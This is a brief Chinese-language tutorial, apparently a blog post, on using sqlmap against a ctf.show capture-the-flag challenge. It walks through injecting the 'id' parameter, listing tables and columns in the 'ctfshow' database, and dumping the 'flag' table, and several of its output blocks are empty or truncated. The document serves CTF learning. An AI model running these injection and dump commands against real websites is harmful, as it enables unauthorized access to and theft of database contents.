sqlmap使用

sqlmap使用
huaruisqlmap使用
- 常用参数
| 1 | 常用参数 | 
第一步:开始脚本注入
- 使用sqlmap -u url来进行注入
例:
sqlmap -u “http://d96b8b94-0e30-4e6a-810b-caf654fe2b02.challenge.ctf.show/?id=“
第二步:查表
执行上述命令后得到注入成功的回显然后可以进行查库操作
如上述命令执行后得到
| 1 | 
 | 
- 接下来可以查看指定库的所有表:sqlmap -u “http://d96b8b94-0e30-4e6a-810b-caf654fe2b02.challenge.ctf.show/?id=“ -D ctfshow –tables 
- 得到回显 
| 1 | Database: ctfshow | 
- 到这里就说明查询到表flag了,接下来使用: sqlmap -u “http://d96b8b94-0e30-4e6a-810b-caf654fe2b02.challenge.ctf.show/?id=“ -D ctfshow -T flag –columns
| 1 | 
 | 
- 接下来使用直接dump出来: sqlmap -u “http://d96b8b94-0e30-4e6a-810b-caf654fe2b02.challenge.ctf.show/?id=“ -D ctfshow -T flag –dump
| 1 | Database: ctfshow | 




